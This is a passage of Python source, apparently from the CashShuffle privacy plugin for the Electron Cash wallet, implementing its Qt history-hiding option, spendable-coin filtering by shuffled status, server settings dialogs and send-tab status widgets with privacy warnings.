# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
# Handle the possibility that, now that the plugin was closed or opened, shuffle tx's need to be hidden or unhidden in the history lists.
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
external_coin_addresses = set() # this is only ever used if they are doing a sweep. in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
# in Cash-Shuffle mode + shuffled spending we can ONLY spend shuffled coins + unshuffled living on a shuffled coin address
shuf_adrs_seen = set()
shuf_coins_seen = set()
for coin in coins.copy():
if coin['address'] in external_coin_addresses:
# completely bypass this filter for external keypair dict
# which is only used for sweep dialog in send tab
continue
is_shuf_adr = CoinUtils.is_shuffled_address(window.wallet, coin['address'])
if is_shuf_adr:
shuf_adrs_seen.add(coin['address'])
if (not CoinUtils.is_coin_shuffled(window.wallet, coin)
and not is_shuf_adr): # we allow coins sitting on a shuffled address to be "spent as shuffled"
coins.remove(coin)
else:
shuf_coins_seen.add(CoinUtils.get_name(coin))
# NEW! Force co-spending of other coins sitting on a shuffled address (Fix #3)
for adr in shuf_adrs_seen:
adr_coins = window.wallet.get_addr_utxo(adr)
for name, adr_coin in adr_coins.items():
if name not in shuf_coins_seen and not adr_coin['is_frozen_coin']:
coins.append(adr_coin)
shuf_coins_seen.add(name)
elif spend_mode == extra.SpendingModeUnshuffled:
# in Cash-Shuffle mode + unshuffled spending we can ONLY spend unshuffled coins (not sitting on a shuffled address)
for coin in coins.copy():
if ((CoinUtils.is_coin_shuffled(window.wallet, coin)
or is_coin_busy_shuffling(window, coin)
or CoinUtils.is_shuffled_address(window.wallet, coin['address']))
and coin['address'] not in external_coin_addresses):
coins.remove(coin)
@hook
def balance_label_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf = shuf
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
window.send_tab_shuffle_extra.refresh(shuf, unshuf, uprog, usas)
if nShuf:
return (_('Shuffled: {} {} in {} Coin'),
_('Shuffled: {} {} in {} Coins'))[0 if nShuf == 1 else 1].format(window.format_amount(totShuf).strip(), window.base_unit(), nShuf)
return None
@hook
def not_enough_funds_extra(self, window):
if window not in self.windows:
return
shuf, unshuf, uprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(window.wallet)
totShuf, nShuf, totUnshuf, nUnshuf, totInProg, nInProg = *shuf, *unshuf, *uprog
# TODO: handle usas separately?
totShuf += usas[0]
nShuf += usas[1]
extra = window.send_tab_shuffle_extra
extra.refresh(shuf, unshuf, uprog)
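# Note: 'usas' isn't passed here, so SendTabExtra.refresh() will re-query the
# shuffled/unshuffled totals itself (it re-fetches whenever any argument is None).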
spend_mode = extra.spendingMode()
rets = []
if spend_mode == extra.SpendingModeShuffled:
if totUnshuf:
rets += [_("{} {} are unshuffled").format(window.format_amount(totUnshuf).strip(), window.base_unit())]
elif spend_mode == extra.SpendingModeUnshuffled:
if totShuf:
rets += [_("{} {} are shuffled").format(window.format_amount(totShuf).strip(), window.base_unit())]
if totInProg:
rets += [_("{} {} are busy shuffling").format(window.format_amount(totInProg).strip(), window.base_unit())]
return ') ('.join(rets) or None
@hook
def get_change_addrs(self, wallet):
for window in self.windows:
if wallet == window.wallet:
change_addrs = [wallet.cashshuffle_get_new_change_address()]
wallet.print_error("CashShuffle: reserving change address",change_addrs[0].to_ui_string())
return change_addrs
@hook
def do_clear(self, w):
for window in self.windows:
if w is window:
extra = getattr(w, 'send_tab_shuffle_extra', None)
if extra:
extra.do_clear()
return
def restart_all(self):
for window in self.windows:
bp = window.background_process
if bp:
password = bp.get_password()
network_settings = Plugin.get_network_settings(window.config)
if network_settings:
bp.join()
# kill the extant console logger as its existence can cause subtle bugs
bp.logger.disconnectAll(); bp.logger.deleteLater(); bp.logger = None
network_settings['host'] = network_settings.pop('server')
window.background_process = None; del bp
start_background_shuffling(window, network_settings, password=password)
window.print_error("CashShuffle restarted for wallet")
nd = Plugin.network_dialog
# force network settings tab to also refresh itself on restart to keep it in synch with other possible settings dialogs
if nd:
st = getattr(nd, "__shuffle_settings__", None)
if st: st.refreshFromSettings()
else:
window.print_error("ERROR: could not load network settings, FIXME!")
else:
window.print_error("WARNING: Window lacks a background_process, FIXME!")
def view_pools(self, window):
assert isinstance(window, ElectrumWindow), "view_pools must be passed an ElectrumWindow object! FIXME!"
settings = __class__.get_and_validate_network_settings(window.config)
if settings:
sdict = settings.copy()
sdict['name'] = "{}:{}".format(sdict['server'], sdict['info'])
PoolsWinMgr.show(sdict, settings, window.config, parent_window=window, modal=False)
else:
# this should not normally be reachable in the UI, hence why we don't i18n the error string.
window.show_error("CashShuffle is not properly set up -- no server defined! Please select a server from the settings.")
def settings_dialog(self, window, msg=None, restart_ask = True):
def window_parent(w):
# this is needed because WindowModalDialog overrides window.parent
if callable(w.parent): return w.parent()
return w.parent
while not isinstance(window, ElectrumWindow) and window and window_parent(window):
# MacOS fixups -- we can get into a situation where we are created without the ElectrumWindow being an immediate parent or grandparent
window = window_parent(window)
assert window and isinstance(window, ElectrumWindow)
d = SettingsDialog(title=_("CashShuffle Settings"), config=window.config, message=msg)
try:
server_ok = False
ns = None
while not server_ok:
if not d.exec_():
return
else:
ns = d.get_form()
server_ok = d.serverOk
if not server_ok:
server_ok = Plugin.show_bad_server_box()
if ns:
Plugin.save_network_settings(window.config, ns)
if restart_ask:
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."))
return ns
finally:
d.deleteLater()
del d
@staticmethod
def show_bad_server_box():
return bool(QMessageBox.critical(None, _("Error"), _("Unable to connect to the specified server."), QMessageBox.Retry|QMessageBox.Ignore, QMessageBox.Retry) == QMessageBox.Ignore)
@staticmethod
def try_to_apply_network_dialog_settings(settings_tab):
ns = settings_tab.get_form()
if ns and (settings_tab.serverOk or Plugin.show_bad_server_box()):
Plugin.save_network_settings(settings_tab.config, ns) # save settings first.
gui = Plugin.gui
instance = Plugin.instance
window = None
# Next, try and get a wallet window to query user for plugin restart. If no window found, that's ok. Restart won't be necessary. :)
if instance and instance.windows:
# first try and get a window that actually has cashshuffle running, as that's only polite
window = instance.windows[-1]
elif instance and instance.disabled_windows:
# ok, no enabled windows -- next, get a window that is cashshuffle compatible, if any exist
window = instance.disabled_windows[-1]
elif gui and gui.windows:
# If that fails, get any old window...
window = gui.windows[-1]
# NB: if no window at this point, settings will take effect next time CashShuffle is enabled for a window
if window:
# window will raise itself.
window.restart_cashshuffle(msg = _("CashShuffle must be restarted for the server change to take effect."),
parent = Plugin.network_dialog)
@staticmethod
def save_network_settings(config, network_settings):
ns = copy.deepcopy(network_settings)
print_error("Saving network settings: {}".format(ns))
config.set_key(ConfKeys.Global.SERVER, ns)
@staticmethod
def get_network_settings(config):
return copy.deepcopy(config.get(ConfKeys.Global.SERVER, None))
@staticmethod
def get_and_validate_network_settings(config):
selected = dict()
try:
# try and pre-populate from config
current = __class__.get_network_settings(config)
dummy = (current["server"], current["info"], current["ssl"]); del dummy;
selected = current
except (KeyError, TypeError):
pass
return selected
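# When valid, the settings dict returned above has the shape
#   {'server': <host string>, 'info': <integer port, the "P:" spin box>, 'ssl': <bool>}
# (the same keys produced by SettingsDialogMixin.get_form and consumed by save_network_settings).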
def settings_widget(self, window):
weakMeth = Weak(self.settings_dialog)
weakWindow = Weak(window)
return EnterButton(_('Settings'), lambda: weakMeth(weakWindow))
def requires_settings(self):
return True
def _delete_old_keys(self, config_or_wallet):
getter, setter, defuncts, thing = None, None, tuple(), None
if isinstance(config_or_wallet, SimpleConfig):
config = config_or_wallet
getter = lambda k: config.get(k)
setter = lambda k: config.set_key(k, None, save=True)
defuncts = ConfKeys.Global.DEFUNCT
thing = "config"
elif isinstance(config_or_wallet, Abstract_Wallet):
storage = config_or_wallet.storage
getter = lambda k: storage.get(k)
setter = lambda k: storage.put(k, None)
defuncts = ConfKeys.PerWallet.DEFUNCT
thing = "wallet.storage for {}".format(config_or_wallet.basename())
if thing:
ct = 0
for k in defuncts:
if getter(k) is not None:
ct += 1
setter(k)
if ct:
self.print_error("Found and removed {} deprecated keys from {}".format(ct, thing))
# counters: shuffle counter and session counter
@classmethod
def _increment_generic_counter(cls, window, key):
window.wallet.storage.put(key, cls._get_generic_counter(window, key) + 1)
@staticmethod
def _get_generic_counter(window, key):
try:
ctr = int(window.wallet.storage.get(key, 0))
except (ValueError, TypeError): # paranoia
# stored value must have not been an int. :(
ctr = 0
return ctr
@classmethod
def _increment_session_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _get_session_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SESSION_COUNTER)
@classmethod
def _increment_shuffle_counter(cls, window):
cls._increment_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
@classmethod
def _get_shuffle_counter(cls, window):
return cls._get_generic_counter(window, ConfKeys.PerWallet.SHUFFLE_COUNTER)
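# The session counter tracks how many times shuffling was enabled for a wallet
# (incremented in _enable_for_window); the shuffle counter tracks shuffles for which
# a "Shuffle ..." label was applied (incremented via _increment_shuffle_counter above).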
# /counters
def warn_if_shuffle_disable_not_ok(self, window, *, msg=None):
'''
Determine if disabling (or not re-enabling in the case of a pw dialog
cancel) of cash shuffle is ok for this wallet.
This method may block the GUI with a local modal dialog asking the user
if they are sure.
In the future, we may also put code to say "shuffles pending, please
wait..." in a cancellable progress-type dialog.
Returns True if calling code should proceed with disable action.
'''
# Note -- window may not necessarily be shuffle patched as this
# may be called from the password dialog
noprompt = window.wallet.storage.get(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, False)
if not noprompt and type(self)._get_session_counter(window) > 0:
if msg is None:
msg = _('You are now <i>disabling</i> CashShuffle for this wallet. Are you sure?')
ans, chk = window.question(
msg=msg,
informative_text=_('Spending and linking coins with CashShuffle disabled may compromise your privacy for both shuffled and unshuffled coins in this wallet.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
window.wallet.storage.put(ConfKeys.PerWallet.DISABLE_NAGGER_NOPROMPT, bool(chk))
return bool(ans)
return True
class SendTabExtraDisabled(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user CashShuffle was disabled for this wallet '''
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 6, 6, 6)
self.txt = "<big><b>{}</b></big> {}".format(_("CashShuffle Disabled"), _("Your shuffled and unshuffled coins can be mixed and spent together."))
self.msg = "{}\n\n{}\n\n{}".format(_("When CashShuffle is disabled, your privacy on the blockchain is reduced to traditional levels, and 'chainalysis' becomes easier (your transactions can be associated with one another)."),
_("This spending mode is the same as previous versions of Electron Cash, which did not offer CashShuffle."),
_("You may toggle CashShuffle back on at any time using the 'CashShuffle' icon in the status bar."))
self.titleLabel = HelpLabel(self.txt, self.msg)
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft|Qt.AlignVCenter)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(75, ":icons/CashShuffleLogos/logo-vertical_grayed.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
icon.setToolTip(_("CashShuffle Disabled"))
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
class SendTabExtra(QFrame, PrintError):
''' Implements a Widget that appears in the main_window 'send tab' to inform the user of shuffled coin status & totals '''
needRefreshSignal = pyqtSignal() # protocol thread uses this signal to tell us that amounts have changed
needWalletSaveSignal = pyqtSignal() # protocol thread uses this signal to tell us that the wallet should be saved to disk using storage.write
pixmap_cached = None # singleton gets initialized first time an instance of this class is constructed. Contains the cashshuffle_icon5.png scaled to 125px width
def __init__(self, window):
self.send_tab = window.send_tab
self.send_grid = window.send_grid
self.wallet = window.wallet
self.window = window
super().__init__(window.send_tab)
self.send_grid.addWidget(self, 0, 0, 1, self.send_grid.columnCount()) # just our luck. row 0 is free!
self.setup()
def setup(self):
self.setFrameStyle(QFrame.StyledPanel|QFrame.Sunken)
l = QGridLayout(self)
l.setVerticalSpacing(6)
l.setHorizontalSpacing(30)
l.setContentsMargins(6, 12, 6, 12)
self.msg = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("If insufficient shuffled funds are available, you can wait a few minutes as coins are shuffled in the background."))
self.msg2 = "{}\n\n{}\n\n{}".format(_("For improved privacy, shuffled coins and unshuffled coins cannot be sent together in the same transaction when CashShuffle is enabled."),
_("You may switch between shuffled and unshuffled spending using the radio buttons on the right."),
_("Some of your unshuffled funds may be temporarily locked while the shuffle operation is performed. If you want to unlock these funds immediately, you can use the 'Pause Shuffling' button to do so."))
self.titleLabel = HelpLabel("", "") # Will be initialized by self.onSpendRadio() below
self.titleLabel.setParent(self)
l.addWidget(self.titleLabel, 0, 1, 1, 4)
self.spendButtons = QButtonGroup(self)
# Shuffled
self.shufLabel = HelpLabel(_("Shuffled available:"), self.msg)
m = _("Shuffled (private) funds")
self.shufLabel.setToolTip(m)
self.shufLabel.setParent(self)
l.addWidget(self.shufLabel, 1, 1)
self.amountLabel = QLabel("", self); self.amountLabel.setToolTip(m)
l.addWidget(self.amountLabel, 1, 2)
self.numCoinsLabel = QLabel("", self); self.numCoinsLabel.setToolTip(m)
l.addWidget(self.numCoinsLabel, 1, 3)
self.spendShuffled = QRadioButton(_("Spend Shuffled"), self); self.spendShuffled.setToolTip(_("Spend only your shuffled (private) coins"))
l.addWidget(self.spendShuffled, 1, 4)
self.spendButtons.addButton(self.spendShuffled)
# Unshuffled
self.unshufLabel = HelpLabel(_("Unshuffled available:"), self.msg2)
m = _("Funds that are not yet shuffled")
self.unshufLabel.setToolTip(m)
self.unshufLabel.setParent(self)
l.addWidget(self.unshufLabel, 2, 1)
self.amountLabelUnshuf = QLabel("", self); self.amountLabelUnshuf.setToolTip(m)
l.addWidget(self.amountLabelUnshuf, 2, 2)
self.numCoinsLabelUnshuf = QLabel("", self); self.numCoinsLabelUnshuf.setToolTip(m)
l.addWidget(self.numCoinsLabelUnshuf, 2, 3)
self.spendUnshuffled = QRadioButton(_("Spend Unshuffled"), self); self.spendUnshuffled.setToolTip(_("Spend only your unshuffled coins"))
l.addWidget(self.spendUnshuffled, 2, 4)
self.spendButtons.addButton(self.spendUnshuffled)
self.spendShuffled.setChecked(True)
# In Progress
self.msg3 = _("Funds that are busy being shuffled are not available for spending until they are shuffled. To spend these funds immediately, use the 'Pause Shuffling' button to temporarily suspend CashShuffle.")
self.busyLbl = HelpLabel(_("Busy shuffling:"), self.msg3)
self.busyLbl.setParent(self)
m = _("Funds currently being shuffled")
self.busyLbl.setToolTip(m)
l.addWidget(self.busyLbl, 3, 1)
self.amountLabelBusy = QLabel("", self); self.amountLabelBusy.setToolTip(m)
l.addWidget(self.amountLabelBusy, 3, 2)
self.numCoinsLabelBusy = QLabel("", self); self.numCoinsLabelBusy.setToolTip(m)
l.addWidget(self.numCoinsLabelBusy, 3, 3)
self.pauseBut = QPushButton("", self) # Button text filled in by refresh() call
self.pauseBut.setDefault(False); self.pauseBut.setAutoDefault(False); self.pauseBut.setCheckable(True)
self.pauseBut.setToolTip(_("Pause/Unpause the background shuffle process (frees up 'busy' coins for spending)"))
l.addWidget(self.pauseBut, 3, 4)
l.setAlignment(self.titleLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabel, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelUnshuf, Qt.AlignLeft)
l.setAlignment(self.numCoinsLabelBusy, Qt.AlignLeft)
l.addItem(QSpacerItem(1, 1, QSizePolicy.MinimumExpanding, QSizePolicy.Fixed), 1, 5)
icon = FixedAspectRatioSvgWidget(125, ":icons/CashShuffleLogos/logo-vertical.svg")
icon.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
l.addWidget(icon, 0, 0, l.rowCount(), 1)
l.setSizeConstraint(QLayout.SetNoConstraint)
self.spendButtons.buttonClicked.connect(self.onSpendRadio)
self.window.history_updated_signal.connect(self.refresh)
self.needRefreshSignal.connect(self.refresh)
self.needRefreshSignal.connect(self.window.update_fee)
self.needWalletSaveSignal.connect(self.wallet.storage.write)
self.spendButtons.buttonClicked.connect(lambda x="ignored": self.refresh())
self.pauseBut.clicked.connect(self.onClickedPause)
self.onSpendRadio() # sets up the title label and possibly warns user if starting up in "spend unshuffled" mode
def onSpendRadio(self, ignored = None):
which = self.spendingMode()
if which == self.SpendingModeShuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <b>shuffled</b> funds will be sent")))
self.titleLabel.help_text = self.msg
self.forceUnpause()
#self.pauseBut.setDisabled(True)
elif which == self.SpendingModeUnshuffled:
self.titleLabel.setText("<big><b>{}</b></big> ({})"
.format(_("CashShuffle Enabled"), _("Only <i>unshuffled</i> funds will be sent")))
self.titleLabel.help_text = self.msg2
#self.pauseBut.setEnabled(bool(self.window.background_process and not self.window.background_process.is_offline_mode()))
noprompt = self.wallet.storage.get(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, False)
if not noprompt:
ans, chk = self.window.question(
msg=_('You are now spending <b><i>unshuffled</i></b> coins. Are you sure?'),
informative_text=_('Spending and linking these coins may compromise your privacy not only for new received coins, but also for your past spending of shuffled coins.'),
title=_("Privacy Warning"), rich_text=True,
checkbox_text=_("Never ask for this wallet"), checkbox_ischecked=noprompt,
)
if chk:
self.wallet.storage.put(ConfKeys.PerWallet.SPEND_UNSHUFFLED_NAGGER_NOPROMPT, bool(chk))
if not ans:
self.spendShuffled.animateClick()
return
self.window.update_fee()
def onClickedPause(self, b):
if self.window.background_process:
self.window.background_process.set_paused(b)
# Note: the GUI refresh() will later also set this string, but we set it immediately here so the UI feels peppier
self.pauseBut.setText(_("Pause Shuffling") if not b else _("Shuffling Paused"))
self.window.utxo_list.update()
def do_clear(self): # called by plugin hook do_clear()
self.forceUnpause()
self.refresh()
def forceUnpause(self):
if self.window.background_process:
self.window.background_process.set_paused(False)
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling"))
def showEvent(self, e):
super().showEvent(e)
self.refresh()
_templates = tuple()
@rate_limited(0.250)
def refresh(self, shuf=None, unshuf=None, inprog=None, usas=None):
if not hasattr(self.window.wallet, '_shuffle_patched_'):
# this can happen if this timer fires after the wallet was "un-monkey-patched". It's the price we pay for @rate_limited. :)
return
if shuf is None or unshuf is None or inprog is None or usas is None:
shuf, unshuf, inprog, usas = CoinUtils.get_shuffled_and_unshuffled_coin_totals(self.window.wallet)
amount, n, amountUnshuf, nUnshuf, amountInProg, nInProg = *shuf, *unshuf, *inprog
amount += usas[0]
n += usas[1]
# TODO: handle usas separately?
if not __class__._templates: # lazy init
__class__._templates = (
# bold [0]
( # [0] is singular [1] is plural
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ),
( "<b>{}</b> {}", ("<b>{}</b> %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) )
),
# normal [1]
( #[0] singular, [1] plural
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coin"),_("UTXO"))) ), # normal singular
( "{} {}", ("{} %s <small>(%s)</small>"%(_("Coins"),_("UTXOs"))) ) # normal text plural template
)
)
bt = self._templates[0] # bold text templates (sub-list [0]==singular [1]==plural)
nt = self._templates[1] # normal text templates (sub-list [0]==singular [1]==plural)
mode = self.spendingMode()
tshuf = (bt if mode == self.SpendingModeShuffled else nt)[0 if n == 1 else 1] # select a template based on mode & plurality
tunshuf = (bt if mode == self.SpendingModeUnshuffled else nt)[0 if nUnshuf == 1 else 1] # select a template based on mode
self.amountLabel.setText(tshuf[0].format(self.window.format_amount(amount).strip(), self.window.base_unit()))
self.numCoinsLabel.setText(tshuf[1].format(n))
self.amountLabelUnshuf.setText(tunshuf[0].format(self.window.format_amount(amountUnshuf).strip(), self.window.base_unit()))
self.numCoinsLabelUnshuf.setText(tunshuf[1].format(nUnshuf))
tbusy = nt[0 if nInProg == 1 else 1]
self.amountLabelBusy.setText(tbusy[0].format(self.window.format_amount(amountInProg).strip(), self.window.base_unit()))
self.numCoinsLabelBusy.setText(tbusy[1].format(nInProg))
f = self.spendShuffled.font()
f.setBold(bool(mode == self.SpendingModeShuffled))
self.spendShuffled.setFont(f)
f = self.spendUnshuffled.font()
f.setBold(bool(mode == self.SpendingModeUnshuffled))
self.spendUnshuffled.setFont(f)
if self.window.background_process:
is_paused = self.window.background_process.get_paused()
self.pauseBut.setChecked(is_paused)
else:
self.pauseBut.setChecked(False)
self.pauseBut.setText(_("Pause Shuffling") if not self.pauseBut.isChecked() else _("Shuffling Paused"))
self.pauseBut.setEnabled(bool(self.window.background_process #and mode == self.SpendingModeUnshuffled
and not self.window.background_process.is_offline_mode()))
SpendingModeShuffled = 1
SpendingModeUnshuffled = 2
SpendingModeUnknown = 0
def spendingMode(self):
''' Returns one of the SpendingMode* class constants above '''
if hasattr(self.wallet, "_shuffle_patched_"):
which = self.spendButtons.checkedButton()
if which is self.spendShuffled: return self.SpendingModeShuffled
elif which is self.spendUnshuffled: return self.SpendingModeUnshuffled
return self.SpendingModeUnknown
def setSpendingMode(self, spendMode):
but2Check = None
if spendMode == self.SpendingModeUnshuffled and not self.spendUnshuffled.isChecked():
but2Check = self.spendUnshuffled
elif spendMode == self.SpendingModeShuffled and not self.spendShuffled.isChecked():
but2Check = self.spendShuffled
if but2Check:
but2Check.setChecked(True)
self.onSpendRadio() # the slot won't get called when setting radio buttons programmatically, so we force-call it here
class NetworkCheckerDelegateMixin:
'''Abstract base for classes receiving data from the NetworkChecker.
SettingsDialog implements this, as does the PoolsWindow.'''
settingsChanged = pyqtSignal(dict)
statusChanged = pyqtSignal(dict)
class SettingsDialogMixin(NetworkCheckerDelegateMixin, PrintError):
''' Abstract base class -- do not instantiate this directly as it will raise errors
because the pyqtSignal cannot be bound to a non-QObject.
Instead, use SettingsDialog and/or SettingsTab, which inherit from this and
are proper QObject subclasses.
Also call __init__ on the QObject/QWidget first before calling this
class's __init__ method.'''
# from base: settingsChanged = pyqtSignal(dict)
# from base: statusChanged = pyqtSignal(dict)
formChanged = pyqtSignal()
_DEFAULT_HOST_SUBSTR = "shuffle.servo.cash" # on fresh install, prefer this server as default (substring match)
def __init__(self, config, message=None):
assert config
assert isinstance(self, QWidget)
self.config = config
self.networkChecker = None
self.serverOk = None
self._vpLastStatus = dict()
self.setup(message)
#DEBUG
destroyed_print_error(self)
def showEvent(self, e):
super().showEvent(e)
self.startNetworkChecker()
def hideEvent(self, e):
super().hideEvent(e)
self.stopNetworkChecker()
def closeEvent(self, e):
super().closeEvent(e)
def from_combobox(self):
d = self.cb.currentData()
if isinstance(d, dict):
host, info, ssl = d.get('server'), d.get('info'), d.get('ssl')
self.le.setText(host)
self.sb.setValue(info)
self.chk.setChecked(ssl)
en = self.cb.currentIndex() == self.cb.count()-1
self.le.setEnabled(en); self.sb.setEnabled(en); self.chk.setEnabled(en)
self.formChanged.emit()
def get_form(self):
ret = {
'server': self.le.text(),
'info' : self.sb.value(),
'ssl' : self.chk.isChecked()
}
if self.isVisible():
customIdx = self.cb.count()-1
if self.cb.currentIndex() == customIdx:
# "remember" what they typed into the custom area..
d = self.cb.itemData(customIdx)
if ret != d:
self.cb.setItemData(customIdx, ret)
return ret
def setup_combo_box(self, selected = {}):
def load_servers(fname):
r = {}
try:
zips = __file__.find(".zip")
if zips == -1:
with open(os.path.join(os.path.dirname(__file__), fname), 'r') as f:
r = json.loads(f.read())
else:
from zipfile import ZipFile
zip_file = ZipFile(__file__[: zips + 4])
with zip_file.open("shuffle/" + fname) as f:
r = json.loads(f.read().decode())
except:
self.print_error("Error loading server list from {}: {}", fname, str(sys.exc_info()[1]))
return r
# /
servers = load_servers("servers.json")
selIdx, defIdx = (-1,)*2
self.cb.clear()
for host, d0 in sorted(servers.items()):
d = d0.copy()
d['server'] = host
item = _elide(host) + (' [ssl]' if d['ssl'] else '')
self.cb.addItem(item, d)
if selected and selected == d:
selIdx = self.cb.count()-1
elif defIdx < 0 and self._DEFAULT_HOST_SUBSTR in host:
defIdx = self.cb.count()-1
self.cb.addItem(_("(Custom)"))
if selIdx > -1:
self.cb.setCurrentIndex(selIdx)
elif selected and len(selected) == 3:
custIdx = self.cb.count()-1
self.cb.setItemData(custIdx, selected.copy())
self.cb.setCurrentIndex(custIdx)
elif defIdx > -1:
self.cb.setCurrentIndex(defIdx)
def refreshFromSettings(self):
selected = Plugin.get_and_validate_network_settings(self.config)
self.setup_combo_box(selected = selected)
return selected
def setup(self, msg):
vbox = QVBoxLayout(self)
if not msg:
msg = _("Choose a CashShuffle server or enter a custom server.\nChanges will require the CashShuffle plugin to restart.")
l = QLabel(msg + "\n")
l.setAlignment(Qt.AlignHCenter|Qt.AlignTop)
vbox.addWidget(l)
grid = QGridLayout()
vbox.addLayout(grid)
self.cb = QComboBox(self)
self.refreshFromSettings()
grid.addWidget(QLabel(_('Servers'), self), 0, 0)
